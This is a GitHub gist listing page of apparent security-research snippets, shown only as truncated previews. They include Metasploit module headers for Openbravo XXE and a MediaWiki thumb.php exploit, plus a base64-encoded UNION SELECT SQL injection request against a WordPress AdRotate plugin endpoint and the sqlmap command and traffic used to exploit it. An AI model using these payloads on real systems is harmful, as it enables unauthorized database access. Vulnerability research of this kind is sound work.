Skip to content

Instantly share code, notes, and snippets.

thought bleeding

Brandon Perry brandonprry

thought bleeding
Block or report user

Report or block brandonprry

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View gist:6373428
using System;
namespace floor
class MainClass
public static void Main (string[] args)
Random r = new Random ();
View gist:6826061
This file has been truncated, but you can view the full file.
View gist:7273935
bperry@w00den-pickle:~/Projects/metasploit-framework$ ./msfconsole -q
msf > use auxiliary/admin/http/openbravo_xxe
msf auxiliary(openbravo_xxe) > set RHOST
msf auxiliary(openbravo_xxe) > show options
Module options (auxiliary/admin/http/openbravo_xxe):
Name Current Setting Required Description
---- --------------- -------- -----------
brandonprry / gist:7885229
Created Dec 10, 2013
to_sym vs :"#{string}"
View gist:7885229
branperry-mbk:~ brandon.perry$ ruby syntax
branperry-mbk:~ brandon.perry$ ruby to_sym
branperry-mbk:~ brandon.perry$ ruby syntax
branperry-mbk:~ brandon.perry$ ruby to_sym
branperry-mbk:~ brandon.perry$ cat to_sym
x =
brandonprry / mediawiki_djvu_thumb_exec.rb
Last active Dec 28, 2016
Quick mediawiki thumb.php exploit
View mediawiki_djvu_thumb_exec.rb
# This module requires Metasploit: http//
# Current source:
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
brandonprry / gist:8947140
Last active Aug 29, 2015
Tested against 340vx
View gist:8947140
# This module requires Metasploit: http//
# Current source:
require 'msf/core'
require 'digest/md5'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
View gist:9198941
GET /wp-content/plugins/adrotate/library/clicktracker.php?track=LTEgVU5JT04gQUxMIFNFTEVDVCAzLDEsMSwxLS0= HTTP/1.1
Accept-Language: en-us
Accept-Encoding: gzip,deflate
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.73.11 (KHTML, like Gecko) Version/7.0.1 Safari/537.73.11
View gist:9199424
bperry@w00den-pickle:~/tools/sqlmap$ rm -rf output/
bperry@w00den-pickle:~/tools/sqlmap$ ./ -r /tmp/req.req --level=5 --risk=3 --technique=u --tamper=base64encode
sqlmap/1.0-dev-58eac36 - automatic SQL injection and database takeover tool
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 17:18:53
View gist:9200346
HTTP request [#1]:
GET /wp-content/plugins/adrotate/library/clicktracker.php?track=1 HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-58eac36 (
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Pragma: no-cache
Cache-control: no-cache,no-store
View gist:9330240
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
You can’t perform that action at this time.